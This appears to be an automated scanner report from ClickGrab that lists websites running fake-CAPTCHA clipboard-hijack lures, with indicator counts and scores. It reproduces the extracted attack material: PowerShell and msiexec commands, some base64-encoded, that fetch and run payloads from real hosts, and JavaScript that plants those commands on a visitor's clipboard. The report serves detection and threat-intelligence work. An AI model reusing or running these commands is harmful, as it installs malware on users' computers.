ClickGrab Report - December 05, 2025

2

base64

1

redirect chains

1

redirect follows

2

suspicious keywords

🔍 Suspicious Keywords 2

robot

hidden

🌐 Extracted URLs 189

https://ogp.me/ns#

https://rankmath.com/

https://theharadamethod.com/

https://theharadamethod.com/wp-content/uploads/2025/11/The-Harada-Method-Website-1024x768.jpg

🔁 External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://www.paypal.com/sdk/js?client-id=BAAgukaSKUWfGmo5qaYjaFdneRKeHtfIJbgvA970QDiBQlJpvV-0O_90O-19niccjjEnzu0FqJA9rcAw6U&components=hosted-buttons&disable-funding=venmo&currency=USD

Type: script_src

Destination (first appearance): https://www.paypalobjects.com/upstream/bizcomponents/js/modal.js

var t,o=document.createElement("script");o.setAttribute("data-pp-namespace",r),o.src="https://www.paypalobjects.com/upstream/bizcomponents/js/modal.js",o.addEventListener("error",(function(n){e(n)})),o.addEventListener("load",(function(){va…

🛰️ Redirect Follower Findings (1)

Source: external_js

Method: script_src

Original: https://www.paypalobjects.com/upstream/bizcomponents/js/modal.js

Final: https://www.paypalobjects.com/upstream/bizcomponents/js/modal.js

var t,o=document.createElement("script");o.setAttribute("data-pp-namespace",r),o.src="https://www.paypalobjects.com/upstream/bizcomponents/js/modal.js",o.addEventListener("error",(function(n){e(n)})),o.addEventListener("load",(function(){va…

Status: ok

/* version: 1.75.0 */
!function(n){var e={};function t(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return n[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}t.m=n,t.c=e,t.d=function(n,e,r){t.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:r})},t.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"__esModule",{value:!0})},t.t=function(n,e){if(1&e&&(n=t(n)),8&e)return n;if(4&e&... [truncated]

https://onari-aikido.com

65 indicators detected

Score: 539 Clipboard Hijack Fake CAPTCHA

6

clipboard

3

captcha

2

base64

18

suspicious keywords

🔍 Suspicious Keywords 18

command = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";

exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";

CAPTCHA Verification

Verification ID

verification id

Ray ID

ray id

I am not a robot

Robot

robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://sandyrelief.aurovine.com

50 indicators detected

Score: 417 PowerShell Clipboard Hijack

3

powershell

6

clipboard

4

captcha

16

suspicious keywords

1

high risk

💻 PowerShell Commands 3

powershell -nop -w h -c "$L='C:\Users\Public\Documents\job.ps1'; [IO.File]::WriteAllBytes($L, (iwr 'http://dadeshobbymarket.net/amzz.jpeg' -UseBasicParsing).Content); powershell -w h -ep Bypass -f $L"`;

iwr

EMBEDDED_IN_JS: powershell -nop -w h -c

🔍 Suspicious Keywords 16

command = `powersheii -nop -w h -c "$L='C:\Users\Pubiic\Documents\job.psi'; [IO.Fiie]::WriteAiiBytes($L, (iwr 'http://dadeshobbymarket.net/amzz.jpeg' -UseBasicParsing).Content); powersheii -w h -ep Bypass -f $L"`;

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

verification-id

🌐 Extracted URLs 4

https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg

https://i.postimg.cc/k4zrz92z/111.png

http://dadeshobbymarket.net/amzz.jpeg

https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...d(textarea); textarea.select(); document.execCommand('copy'); document.body.removeChild(textarea);...

...Default(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); console.log('â '...

https://www.bratusferramentas.grupomoltz.com.br/

42 indicators detected

Score: 371 PowerShell Clipboard Hijack

3

powershell

5

clipboard

7

captcha

3

base64

1

redirect follows

13

suspicious keywords

3

high risk

💻 PowerShell Commands 3

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing)

iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification

Verification ID

I am not a robot

robot

Robot

Verification

verification

verification-id

verification_id

Verify You Are Human

🌐 Extracted URLs 2

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "â ''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {...

🛰️ Redirect Follower Findings (1)

Source: inline_js

Method: base64_payload

Original: https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt

iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content

Status: error: HTTPSConnectionPool(host='amazon-ny-gifts.com', port=443): Max retries exceeded with url: /shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt (Caused by NameResolutionError("<urllib3.connection.

https://blessdayservices.org/up/

40 indicators detected

Score: 309 PowerShell Clipboard Hijack

3

powershell

5

clipboard

1

downloads

4

captcha

13

suspicious keywords

2

high risk

💻 PowerShell Commands 3

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";

powershell " + htaPath;

iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification

Verification Hash

I am not a robot

Robot

robot

Verification

verification

verification-id

verification_id

To better prove you are not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

https://www.google.com/intl/en/policies/privacy/

https://www.google.com/intl/en/policies/terms/

https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance)

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...

...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "â ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...

https://82.146.62.232/

45 indicators detected

Score: 297 Fake CAPTCHA Redirect Chain

1

captcha

6

base64

1

redirects

1

redirect follows

4

suspicious keywords

🔍 Suspicious Keywords 4

exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)

robot

exec(

hidden

🌐 Extracted URLs 15

https://svetvip.ru/

https://api.whatsapp.com/send?phone=79258627909

https://svetvip.ru/catalog/vstraivaemye_svetilniki/

https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/

🛰️ Redirect Follower Findings (1)

Source: inline_js

Method: script_src

Original: https://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NjAwNTc4OQEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAE5OTQ0ZGY2ZWZmMGU1MzBiZjYxMWQzOTg5NGI5MzU1NQExNzk2MDA1Nzg5AS8BAQEC&k=c7ce3ad8530fc6a7a4b497b39c3ac44f

Final: https://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NjAwNTc4OQEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAE5OTQ0ZGY2ZWZmMGU1MzBiZjYxMWQzOTg5NGI5MzU1NQExNzk2MDA1Nzg5AS8BAQEC&k=c7ce3ad8530fc6a7a4b497b39c3ac44f

new Image().src='https://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NjAwNTc4OQEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAE5OTQ0ZGY2ZWZmMGU1MzBiZjYxMWQzOTg5NGI5MzU1NQExNzk2MDA1Nzg5AS8BAQEC&k=c7ce3ad8530fc6a7a4b497b39c3ac44f';

Status: ok

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address>
</body></html>

http://82.146.62.232/

44 indicators detected

Score: 292 Fake CAPTCHA Redirect Chain

1

captcha

5

base64

1

redirects

1

redirect follows

4

suspicious keywords

🔍 Suspicious Keywords 4

exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)

robot

exec(

hidden

🌐 Extracted URLs 15

https://svetvip.ru/

https://api.whatsapp.com/send?phone=79258627909

https://svetvip.ru/catalog/vstraivaemye_svetilniki/

https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/

🛰️ Redirect Follower Findings (1)

Source: inline_js

Method: script_src

Original: http://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NjAwNTgwMAEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAE5ZTVmNTljMDhlMGFmNjU4YTQzZjBjYTM2MjRhNGJiYwExNzk2MDA1ODAwAS8BAQEC&k=94a972581c431aedcb99f2acb40c20f1

Final: http://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NjAwNTgwMAEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAE5ZTVmNTljMDhlMGFmNjU4YTQzZjBjYTM2MjRhNGJiYwExNzk2MDA1ODAwAS8BAQEC&k=94a972581c431aedcb99f2acb40c20f1

new Image().src='http://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5NjAwNTgwMAEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAE5ZTVmNTljMDhlMGFmNjU4YTQzZjBjYTM2MjRhNGJiYwExNzk2MDA1ODAwAS8BAQEC&k=94a972581c431aedcb99f2acb40c20f1';

Status: ok

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address>
</body></html>

2

powershell

4

suspicious keywords

1

high risk

💻 PowerShell Commands 2

powershell -command "iwr update.coinmarketsap.com | iex"</code>

iwr

🔍 Suspicious Keywords 4

command "iwr update.coinmarketsap.com | iex"</code>

command is executed.

iex

hidden

🌐 Extracted URLs 1

https://coinmarketcap.com/favicon.ico

2

powershell

4

suspicious keywords

1

high risk

💻 PowerShell Commands 2

powershell -command "iwr update.coinmarketsap.com | iex"</code>

iwr

🔍 Suspicious Keywords 4

command "iwr update.coinmarketsap.com | iex"</code>

command is executed.

iex

hidden

🌐 Extracted URLs 1

https://coinmarketcap.com/favicon.ico

3

captcha

12

suspicious keywords

🔍 Suspicious Keywords 12

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

robot

Verification

verification

verification-id

Checking if you are human

Verify you are human

🌐 Extracted URLs 4

https://schema.org

https://garanti-sans-virus.com

https://www.google.com/s2/favicons?sz=128&domain=cloudflare.com

https://i.postimg.cc/k4zrz92z/111.png

Threat Intelligence Report

Attack Pattern Analysis

Top Indicators/Keywords

Malicious Sites Detected

🔍 Suspicious Keywords 2

🌐 Extracted URLs 189

🔁 External JavaScript Redirect Chains

🛰️ Redirect Follower Findings (1)

🔍 Suspicious Keywords 18

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 3

🔍 Suspicious Keywords 16

🌐 Extracted URLs 4

📋 Clipboard Manipulation Code

💻 PowerShell Commands 3

🔍 Suspicious Keywords 13

🌐 Extracted URLs 2

📋 Clipboard Manipulation Code

🛰️ Redirect Follower Findings (1)

💻 PowerShell Commands 3

🔍 Suspicious Keywords 13

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 4

🌐 Extracted URLs 15

🛰️ Redirect Follower Findings (1)

🔍 Suspicious Keywords 4

🌐 Extracted URLs 15

🛰️ Redirect Follower Findings (1)

💻 PowerShell Commands 2

🔍 Suspicious Keywords 4

🌐 Extracted URLs 1

💻 PowerShell Commands 2

🔍 Suspicious Keywords 4

🌐 Extracted URLs 1

🔍 Suspicious Keywords 12

🌐 Extracted URLs 4